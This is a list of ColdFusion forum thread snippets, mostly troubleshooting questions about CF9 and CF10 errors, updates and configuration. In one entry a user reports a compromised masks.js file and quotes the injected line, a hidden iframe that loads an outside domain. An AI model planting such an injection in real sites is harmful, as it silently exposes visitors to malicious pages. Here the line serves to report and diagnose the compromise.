Should I use Coldfusion?
Hi I am getting ready to create a large web site. I am still contemplating whether or not to use Coldfusion over another language. Over the weekend, I've been reading the info on CF on the main web...
View Articlespecified CFC could not be found
Googled this for several hours, hope I'm missing the obvious as usual... I'm using CF9 and IIS7. Followed/tailored simple autosuggest code from Ben Forta. Came up with HTML: [code]<cfinput...
View Articleflatten pdf in one scoop?
HiI'm new to cf, and wanting to flatten a form created from Acrobat. I tried to combine the code so it writes out the file once, but ran into the problem that cfpdfform doesn't flatten the file unless...
View ArticleAPSB12-06 and errors
Since applying the latest security patch I am receiving the below events and it has broken two of our apps.03/15 11:54:38 error ROOT CAUSE:...
View ArticleCF10 Update 11
I am trying to install CF10 Update 11 but it is complaining that the jar file is invalid or corrupt. I have attempted to download it now on 3 different computers with the same result on each.
View ArticleCF Service continuously restarts every 25 seconds
After my laptop froze yesterday I rebooted, and now the ColdFusion 9 Application Server service starts and restarts endlessly! Although it's set to start automatically, upon bootup it does not start....
View Articlecoldfusion session variables being lost
ok so when my users login I establish session variables. one of these is employee id. in my Application.cfc I have this at the top: <cfscript>this.name = "My...
View ArticleCFIDE/scripts/masks.js Compromised
We just found an injection at the end of masks.js Here is the content that was added:"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");" Not sure what...
View ArticleRandom but Regular CF9 503 Error - CF-out.log Jrun errors
Environment ColdFusion version: CF9 32-bit (NOT the 9.01 Patch yet)Hotfix version Noneserver OS : Windows 2003 Server 64 Bitwebserver: Apache/2.2.14 (W32) 32 bitdatabase: MSSQL 2008 Express with...
View ArticleCF 10 errors show Error 500 instead of normal error message
Hi, Strangely, our CF 10 server has started to show "500 - Internal server error" whenever a CF error occurs, instead of the normal error message. The error is logged, but the front end shows the error...
View Articlejava update 1.7.0_21 deleted jrunsvc.exe. what replaces it?
I have CF 9.0.0.0 and tried to update from java 1.6.0_14 to java 1.7.0_21 at the request of my security department. CF 9 Application Server used to run with "C:\ColdFusion9\runtime\bin\jrunsvc.exe"...
View Articlecfmap
This question was posted in response to the following article: http://help.adobe.com/en_US/ColdFusion/9.0/CFMLRef/WSAC308487-F029-4f8 9-BAFB-B410E145E86E.html
View ArticleCan't connect CF 9 to MSSQL 2008 R2
I hope some help is out there. I will post the error message at the end of this post. I can't verify a datasource in Administrator. this is the error:Connection verification failed for data source:...
View ArticleCF10 Enterprise License/Dev problem
I am currently trying to learn CF10, Originally I installed the standalone developer edition, recently I decided to go ahead with the enterprise edition. My issue is that when I go to system info to...
View ArticleColdFusion 10 silent installation and configuration
Hi, CF 10 docs seem a tad thin on the subject of silent / unattended / scripted installation and configuration. I need to find a fully automated (scripted) way to do these things:1) install of...
View ArticleCF10: cfchart in a gateway giving: java.lang.NullPointerException
We have recently upgraded to CF10. Our application uses cfchart for reports. In a standard request the charts work perfectly. We create png images en the publish them. All server activit <cfchart...
View ArticleHow to keep serving web pages while server is not logged in?
ColdFusion 10 works just fine serving pages for our Intranet. Installed on Windows Server 2003 SP2, and previously worked fine with a trial version of ColdFusion MX 7. After the installation of...
View ArticleTomcat exception Cannot call sendError() after the response has been committed
CF 10 Developer Edition. Windows XP SP3 When submitting a page that worked fine in CF 7 on this machine, I get an error I've never seen before: ==================HTTP STATUS 500- description: The...
View ArticleHelp with refreshing page error
I created a search result page. User who has no login/password can see the search result but it is read only while user with login/password can do more with the search result.My page is started with:...
View Articlespecified CFC could not be found
Googled this for several hours, hope I'm missing the obvious as usual... I'm using CF9 and IIS7. Followed/tailored simple autosuggest code from Ben Forta. Came up with HTML: [code]<cfinput...
View Article